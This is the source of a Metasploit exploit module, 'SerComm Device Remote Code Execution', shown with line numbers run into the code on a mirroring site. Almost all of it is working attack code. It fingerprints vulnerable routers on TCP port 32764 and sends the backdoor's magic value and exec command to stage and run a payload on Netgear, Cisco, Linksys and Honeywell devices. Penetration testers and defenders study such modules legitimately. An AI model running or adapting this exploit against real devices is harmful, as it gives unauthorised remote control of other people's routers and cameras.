Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/misc/sercomm_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::CmdStager1011def initialize(info={})12super(update_info(info,13'Name' => "SerComm Device Remote Code Execution",14'Description' => %q{15This module will cause remote code execution on several SerComm devices.16These devices typically include routers from NetGear and Linksys.17This module was tested successfully against several NetGear, Honeywell18and Cisco devices.19},20'License' => MSF_LICENSE,21'Author' =>22[23'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc24'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module25],26'Payload' =>27{28'Space' => 10000, # Could be more, but this should be good enough29'DisableNops' => true30},31'Platform' => 'linux',32'Privileged' => false,33'Targets' =>34[35['Generic Linux MIPS Big Endian',36{37'Arch' => ARCH_MIPSBE,38'PackFormat' => 'VVV'39}40],41['Generic Linux MIPS Little Endian',42{43'Arch' => ARCH_MIPSLE,44'PackFormat' => 'NNN'45}46],47['Manual Linux MIPS Big Endian',48{49'Arch' => ARCH_MIPSBE50}51],52['Manual Linux MIPS Little Endian',53{54'Arch' => ARCH_MIPSLE55}56],57['Cisco WAP4410N',58{59'Arch' => ARCH_MIPSBE,60'PackFormat' => 'NNN',61}62],63['Honeywell WAP-PL2 IP Camera',64{65'Arch' => ARCH_MIPSLE,66'PackFormat' => 'VVV'67}68],69['Netgear DG834',70{71'Arch' => ARCH_MIPSBE,72'PackFormat' => 'VVV',73'NoArgs' => true74}75],76['Netgear DG834G',77{78'Arch' => ARCH_MIPSLE,79'PackFormat' => 'VVV',80'PayloadEncode' => 'octal'81}82],83['Netgear DG834PN',84{85'Arch' => ARCH_MIPSBE,86'PackFormat' => 'VVV',87'NoArgs' => true88}89],90['Netgear DGN1000',91{92'Arch' => ARCH_MIPSBE,93'PackFormat' => 'VVV',94'NoArgs' => true95}96],97['Netgear DSG835',98{99'Arch' => ARCH_MIPSBE,100'PackFormat' => 'VVV',101'NoArgs' => true,102}103],104['Netgear WPNT834',105{106'Arch' => ARCH_MIPSBE,107'PackFormat' => 'NNN',108'UploadPath' => '/var',109'PayloadEncode' => 'octal'110}111]112],113'DefaultTarget' => 0,114'References' =>115[116[ 'OSVDB', '101653' ],117[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]118],119'DisclosureDate' => '2013-12-31' ))120121register_options(122[123Opt::RPORT(32764)124])125126register_advanced_options(127[128OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),129OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),130OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),131OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),132])133deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')134end135136def check137fprint = endian_fingerprint138139case fprint140when 'BE'141vprint_status("Detected Big Endian")142return Msf::Exploit::CheckCode::Appears143when 'LE'144vprint_status("Detected Little Endian")145return Msf::Exploit::CheckCode::Appears146end147148return Msf::Exploit::CheckCode::Safe149end150151def exploit152if target.name =~ /Manual/153print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACK advanced options")154@no_args = datastore['NOARGS']155@upload_path = datastore['UPLOADPATH']156@encoding_format = datastore['ENCODING']157@pack_format = datastore['PACKFORMAT']158else159@no_args = target['NoArgs']160@upload_path = target['UploadPath']161@encoding_format = target['PayloadEncode']162@pack_format = target['PackFormat']163end164165execute_cmdstager(166:noargs => @no_args,167:temp => @upload_path,168:enc_format => @encoding_format,169:flavor => :echo170)171end172173def endian_fingerprint174begin175connect176177sock.put(rand_text(5))178res = sock.get_once179180disconnect181182if res && res.start_with?("MMcS")183return 'BE'184elsif res && res.start_with?("ScMM")185return 'LE'186end187rescue Rex::ConnectionError => e188print_error("Connection failed: #{e.class}: #{e}")189end190191return nil192end193194def execute_command(cmd, opts)195# Get the length of the command, for the backdoor's command injection196cmd_length = cmd.length197198# 0x53634d4d => Backdoor code199# 0x07 => Exec command200# cmd_length => Length of command to execute, sent after communication struct201data = [0x53634d4d, 0x07, cmd_length].pack(@pack_format)202203connect204# Send command structure followed by command text205sock.put(data+cmd)206disconnect207208Rex.sleep(1)209end210end211212213